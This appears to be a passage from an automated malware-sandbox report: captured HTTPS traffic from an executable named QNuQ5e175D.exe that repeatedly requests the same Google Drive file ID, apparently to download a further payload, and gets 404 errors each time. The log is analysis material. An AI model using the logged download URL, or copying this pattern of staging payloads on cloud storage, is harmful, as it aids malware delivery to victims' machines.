                                                        2025-01-11 04:13:34 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 5a 76 57 39 55 76 72 2d 4d 34 47 69 34 34 64 32 52 65 59 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lZvW9Uvr-M4Gi44d2ReYyQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49805 | Destination IP: 142.250.184.206 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:13:45 UTC | 422 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:46 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:45 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-fQK_h-Rz4mZLPXh60YOv9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49812 | Destination IP: 172.217.16.193 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2025-01-11 04:13:46 UTC | 464 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:47 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC74Z7wj3dNfFJ2ww21Cok96tTb__X6y5tNVWEkDR6_VkkLawFs1lf9WDObcyb5J8ubT
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:46 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-Qsd--4vV_Jhh6LUxnWo32w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:13:47 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 69 57 61 50 45 52 4d 70 4c 4e 66 58 51 70 30 53 71 54 78 5a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kiWaPERMpLNfXQp0SqTxZA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49886 | Destination IP: 142.250.184.206 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp: 2025-01-11 04:13:57 UTC | Bytes transferred: 422 | Direction: OUT | Data: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        Timestamp: 2025-01-11 04:13:58 UTC | Bytes transferred: 1920 | Direction: IN | Data: HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:58 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-f9cJSS6Tp7joAYh14ll9oQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49894 | Destination IP: 172.217.16.193 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp: 2025-01-11 04:13:58 UTC | Bytes transferred: 464 | Direction: OUT | Data: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        Timestamp: 2025-01-11 04:13:59 UTC | Bytes transferred: 1851 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgQRM5utXp5ejsPbRyIKVp5p5DZITeKIORxY-a4aKBmZfiC3lPcvGxNHGufnAU2v8ZAiquIf5rk
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:59 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-WXRINWntd-QKU3LV0NQD1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        Timestamp: 2025-01-11 04:13:59 UTC | Bytes transferred: 1652 | Direction: IN | Data (ASCII): <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Jk4vmLy67f0AJpcRS77U_Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49968 | Destination IP: 142.250.184.206 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp: 2025-01-11 04:14:10 UTC | Bytes transferred: 422 | Direction: OUT | Data: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        Timestamp: 2025-01-11 04:14:10 UTC | Bytes transferred: 1920 | Direction: IN | Data: HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:10 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-iG3YZpXjbJIsltIpaDJNVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49975 | Destination IP: 172.217.16.193 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp: 2025-01-11 04:14:11 UTC | Bytes transferred: 464 | Direction: OUT | Data: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        Timestamp: 2025-01-11 04:14:11 UTC | Bytes transferred: 1851 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgQepwL3X8bSe-R9rdKhZRT_MAfxTRznKm_KaczQJNbkuQGNzP4KwDRR-A6Tlq-77eRQPgNfrqY
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:11 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-CgtWUXN1hCu2CjyUOZkq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        Timestamp: 2025-01-11 04:14:11 UTC | Bytes transferred: 1652 | Direction: IN | Data (ASCII): <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HdpPZd9mS5CZWTu9x4TKgw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 50014 | Destination IP: 142.250.184.206 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp: 2025-01-11 04:14:22 UTC | Bytes transferred: 422 | Direction: OUT | Data: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        Timestamp: 2025-01-11 04:14:22 UTC | Bytes transferred: 1920 | Direction: IN | Data: HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:22 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-XMyZeD6KjMV_xpIo01y87g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 50015 | Destination IP: 172.217.16.193 | Destination Port: 443 | PID: 7776 | Process: C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        Timestamp: 2025-01-11 04:14:23 UTC | Bytes transferred: 464 | Direction: OUT | Data: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        Timestamp: 2025-01-11 04:14:23 UTC | Bytes transferred: 1844 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgQ7u5BAW8jRP-miQYp0-QWtnpzvShLwc52rxHINiWbMhJcQu4lmchCp9wgbQvw0uVra
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:14:23 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-EW-iSWlwlNDYnMbHYaBvQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
